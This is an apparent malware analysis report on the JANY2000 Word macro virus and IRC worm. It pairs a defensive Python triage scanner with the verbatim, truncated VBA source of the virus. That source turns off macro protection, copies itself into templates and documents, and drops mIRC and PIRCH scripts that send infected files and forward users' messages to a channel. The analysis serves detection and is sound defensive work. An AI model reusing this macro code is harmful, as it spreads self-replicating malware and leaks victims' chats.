Verdict: MALICIOUS
Risk Score: 240
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a Word document carrying a VBA macro virus with an IRC worm component. Its header comment self-identifies as 'JANY2000' by 'Del_Armg0', dated 14 Nov 1999, of type 'W97MacroVirus/Mirc_Pirch_Worm'. On AutoOpen the macro first switches off Word's macro virus protection, the Normal-template save prompt and Ctrl+Break interruption (Options.VirusProtection, Options.SaveNormalPrompt, Application.EnableCancelKey), then exports its own module 'JANY_2000' to 'C:\JANY2000.dll' and imports it into whichever VBA project does not yet contain it: the Normal template (persistence into every future document) or the active document (infection of the file being edited). It then saves the infected document back to its own path and as 'C:\Windows\JANY_is_cute.doc', 'JANY_is_Sweet.doc', 'PASSWORDS.doc' and 'JANY2000.doc'; 'PASSWORDS.doc' is a lure name for a copy of the infected document, not harvested credentials. For spreading, it overwrites 'C:\mirc\Script.ini' and writes a PIRCH events file (staged as 'C:\Windows\eventss.vxd', then copied to 'C:\pirch98\events.ini' and 'C:\pirch32\events.ini') so that the IRC client DCC-sends those copies to every user who joins a channel, relays everything the victim types and every private message received to the channel #Jany2000, and announces itself on connect. Date-triggered routines display French verse on 8 November and 15 May and a Year-2000 greeting on 31 December; no destructive routine appears in the recovered portion of the code (the preview below is truncated).
Heuristics (5)
- ClamAV: Win.Trojan.U-74 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.U-74
- VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro [high] (OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
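The heuristics above are the analyzer's own output. As an added example, not the analyzer's code and not taken from the sample's author, the following Python shows the kind of pattern triage a practitioner runs over decoded olevba output (macros.bas) to surface the behaviours this sample exhibits: auto-exec entry points, Word macro protection switched off, VBProject Export/Import self-replication, IRC client script drops, DCC sends and raw file I/O. The rule names, severities, verdict logic and the constructed macro excerpt used as input are my own assumptions.

```python
"""Triage scanner for VBA source decoded by olevba (added example, not analyzer code)."""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed excerpt of the JANY2000 AutoOpen macro, used as offline test input.
# It is a shortened copy of lines seen in the report, not the full macros.bas.
SAMPLE_VBA = r'''Sub AutoOpen()
On Error Resume Next
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Application.EnableCancelKey = False
Application.VBE.ActiveVBProject.VBComponents("JANY_2000").Export ("C:\JANY2000.dll")
Jany.VBComponents.Import ("C:\JANY2000.dll")
ActiveDocument.SaveAs FileName:="C:\Windows\PASSWORDS.doc", FileFormat:=wdFormatDocument
Kill "C:\mirc\Script.ini"
Open "C:\mirc\Script.ini" For Output As #2
Print #2, "n6=if ( $nick == $me ) { halt } | .dcc send $nick c:\Windows\PASSWORDS.doc"
Close #2
Open "C:\Windows\eventss.vxd" For Output As #3
Close #3
FileCopy SourceFile, DestinationFile
End Sub
Sub Auto_Close()
End Sub
'''


@dataclass(frozen=True)
class Finding:
    rule: str       # rule name (my own naming)
    severity: str   # critical / high / medium (my own weighting)
    line: int       # 1-based line in the VBA source
    text: str       # the offending line, stripped


# (rule, severity, pattern). Each pattern is applied per line, case-insensitively.
RULES = (
    ("auto-exec", "high",
     re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+(?:AutoOpen|Auto_Open|AutoClose|Auto_Close|"
                r"AutoExec|AutoNew|Document_Open|Document_Close)\b", re.I)),
    ("macro-protection-off", "high",
     re.compile(r"\b(?:VirusProtection|SaveNormalPrompt|EnableCancelKey)\s*=\s*False\b", re.I)),
    ("self-replication", "critical",   # VBProject Export/Import = macro virus infection primitive
     re.compile(r"\bVBComponents\b.*\.(?:Export|Import)\b", re.I)),
    ("irc-script-drop", "high",        # mIRC script.ini / PIRCH events.ini worm vector
     re.compile(r"\\(?:mirc\\script\.ini|pirch\d*\\events\.ini)", re.I)),
    ("dcc-send", "high",               # DCC send command embedded in a dropped IRC script
     re.compile(r"\bdcc\s+send\b", re.I)),
    ("system-dir-copy", "medium",      # document copy written under C:\Windows
     re.compile(r"\bSaveAs\b.*C:\\Windows\\", re.I)),
    ("file-io", "medium",              # raw write / delete / copy of files on disk
     re.compile(r"^\s*(?:Open\s+.*\bFor\s+Output\b|Kill\b|FileCopy\b)", re.I)),
)

# Drive-letter paths found anywhere in the source, including inside string literals.
PATH_RE = re.compile(r"[A-Za-z]:\\[\w\\.-]+")


def scan_vba(source):
    """Return every (rule, line) hit, in source order; one line may hit several rules."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule, severity, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(rule, severity, lineno, line.strip()))
    return findings


def summarize(findings):
    """Count hits per rule, e.g. {'auto-exec': 2, ...}."""
    return dict(Counter(f.rule for f in findings))


def extract_paths(source):
    """Sorted, lower-cased, de-duplicated file paths referenced by the macro (IOC candidates)."""
    return sorted({m.group(0).lower() for m in PATH_RE.finditer(source)})


def verdict(findings):
    """Map findings to a triage label: any critical rule, or auto-exec plus another high rule."""
    if not findings:
        return "clean"
    severities = {f.severity for f in findings}
    rules = {f.rule for f in findings}
    if "critical" in severities:
        return "malicious"
    if "auto-exec" in rules and any(f.severity == "high" and f.rule != "auto-exec" for f in findings):
        return "suspicious"
    return "review"


if __name__ == "__main__":
    hits = scan_vba(SAMPLE_VBA)
    for f in hits:
        print(f"{f.severity:8} {f.rule:22} L{f.line}: {f.text}")
    print("rule counts:", summarize(hits))
    print("paths:", extract_paths(SAMPLE_VBA))
    print("verdict:", verdict(hits))
```

The self-replication rule is the one that matters most: a macro that exports its own module and imports it into NormalTemplate.VBProject is a macro virus regardless of what else it does, and that single line is enough to classify the file without any signature. The path extractor gives the host-side IOC list (C:\JANY2000.dll, the C:\Windows copies, the IRC client configs) to check on any machine that opened the document.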
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7122 bytes | cb859865cc95d289dd45ccfb02f4a3af277d4064fcb71ef02c7bee36ddb357af | ClamAV: Win.Trojan.U-74 | unlikely |
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JANY_2000"
'V_Name = [JANY2000]
'Author = [Del_Armg0]
'Date = [14nov99]
'Type = [W97MacroVirus/Mirc_Pirch_Worm/NoDestructor!/AndAlwaysForAGirl;)]
'GreetZ = [Jany, Secret aka Stram ! ;), Phage, all_on_#vxtrader&vx-vtc, Fa, Elsa, Soph&Franck, &marie42_]
'Disclaim=[JE L'AIME TOUTE ENTIERE... SIMPLEMENT]
Sub AutoOpen()
On Error Resume Next
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Application.EnableCancelKey = False
Application.VBE.ActiveVBProject.VBComponents("JANY_2000").Export ("C:\JANY2000.dll")
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "JANY_2000" Then NormInstall = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "JANY_2000" Then ActiveInstall = True
Next I
If ActiveInstall = True And NormInstall = False Then Set Jany = NormalTemplate.VBProject Else
If ActiveInstall = False And NormInstall = True Then Set Jany = ActiveDocument.VBProject
Jany.VBComponents.Import ("C:\JANY2000.dll")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
ActiveDocument.SaveAs FileName:="C:\Windows\JANY_is_cute.doc", FileFormat:=wdFormatDocument
ActiveDocument.SaveAs FileName:="C:\Windows\JANY_is_Sweet.doc", FileFormat:=wdFormatDocument
ActiveDocument.SaveAs FileName:="C:\Windows\PASSWORDS.doc", FileFormat:=wdFormatDocument
ActiveDocument.SaveAs FileName:="C:\Windows\JANY2000.doc", FileFormat:=wdFormatDocument
Kill "C:\mirc\Script.ini"
Open "C:\mirc\Script.ini" For Output As #2
Print #2, "[SCRIPT]"
Print #2, "n0=on 1:start:{"
Print #2, "n1= .remote on"
Print #2, "n2= .ctcps on"
Print #2, "n3= .events on"
Print #2, "n4= }"
Print #2, "n5=on 1:join:#:{"
Print #2, "n6=if ( $nick == $me ) { halt } | .dcc send $nick c:\Windows\PASSWORDS.doc"
Print #2, "n7= }"
Print #2, "n8=on 1:input:*:.msg #Jany2000 [( $+ $active $+ ) $1-]"
Print #2, "n9=on 1:text:*:?:.msg #Jany2000 [( $+ $active $+ ) $1-]"
Print #2, "n10=on 1:FILESENT:*.*:/dcc send $nick C:\Windows\JANY_is_cute.doc"
Print #2, "n10=on 1:FILERCVD:*.*:/dcc send $nick C:\Windows\JANY_is_Sweet.doc"
Print #2, "n11=on 1:connect:.msg #Jany2000 HI!!! Une Jany Virtuelle, c deja ca!!! ;)"
Print #2, ";A Del_Armg0 Script 4 Jany"
Close #2
Kill "C:\Windows\eventss.vxd"
Open "C:\Windows\eventss.vxd" For Output As #3
Print #3, "[Levels]"
Print #3, "Enabled=1"
Print #3, "Count=1"
Print #3, "Level1=000-Unknowns"""
Print #3, "000-UnknownsEnabled=1"
Print #3, ""
Print #3, "[000-Unknowns]"
Print #3, "User1=*!*@*"
Print #3, "UserCount=1"
Print #3, "Event1=;A Del_Armg0 Ripped! Script 4 Jany"
Print #3, "Event2=ON JOIN:#:/dcc send $nick C:\Windows\PASSWORDS.doc"
Print #3, "Event3=ON PART:#:/dcc send $nick C:\Windows\JANY2000.doc"
Print #3, "EventCount=3"
Close #3
Kill "C:\pirch98\events.ini"
Kill "C:\pirch32\events.ini"
SourceFile = "C:\Windows\eventss.vxd"
DestinationFile = "C:\pirch98\events.ini"
FileCopy SourceFile, DestinationFile
SourceFilez = "C:\Windows\eventss.vxd"
DestinationFilez = "C:\pirch32\events.ini"
FileCopy SourceFilez, DestinationFilez
If Day(Now()) = 8 And Month(Now()) = 11 Then
MsgBox "Lorsque tout me ravit, J'ignore" & Chr(13) & Chr(10) & "Si quelque chose me seduit." & Chr(13) & Chr(10) & "Elle eblouit comme l'Aurore" & Chr(13) & Chr(10) & "Et console comme la Nuit;", "JANY2000"
End If
If Day(Now()) = 15 And Month(Now()) = 5 Then
MsgBox "Et l'harmonie est trop exquise," & Chr(13) & Chr(10) & "Qui gouverne tout son beau corps," & Chr(13) & Chr(10) & "Pour que l'impuissante analyse" & Chr(13) & Chr(10) & "En note les nombreux accords.", "JANY2000"
End If
If Day(Now()) = 31 And Month(Now()) = 12 Then
MsgBox "WAAA!!! YEAR2000 Tomorrow!!! Great no?
```

... (truncated)

The extracted source is reproduced verbatim (including the original's French comment and message strings) so that it matches the carved artifact; the date-triggered MsgBox texts are French verse, and the on-connect IRC message reads "HI!!! A virtual Jany, that's already something!!! ;)".